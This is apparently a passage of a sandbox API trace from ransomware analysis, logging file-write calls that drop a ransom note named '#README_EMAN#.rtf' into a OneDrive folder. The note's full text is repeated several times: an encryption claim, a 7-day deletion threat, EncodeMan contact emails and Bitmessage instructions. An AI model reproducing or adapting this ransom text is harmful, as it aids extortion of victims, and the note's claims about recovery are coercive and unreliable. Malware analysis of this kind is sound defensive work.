th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nú¯Õ%\x048èõù^=«\x16O\x1fïж>\x9bXË\x7f\x13\n", lpUsedDefaultChar=0x0) returned 8717 [0299.813] WriteFile (in: hFile=0x2f4, lpBuffer=0x248a258*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x248a258*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0299.813] CloseHandle (hObject=0x2f4) returned 1 [0299.814] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\qml\\QtQuick\\Extras\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\qml\\qtquick\\extras\\#readme_eman#.rtf")) returned 0xffffffff [0299.814] GetLastError () returned 0x2 [0299.814] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\qml\\QtQuick\\Extras\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\qml\\qtquick\\extras\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2f4 [0299.814] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0299.814] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0299.814] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x248a258, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 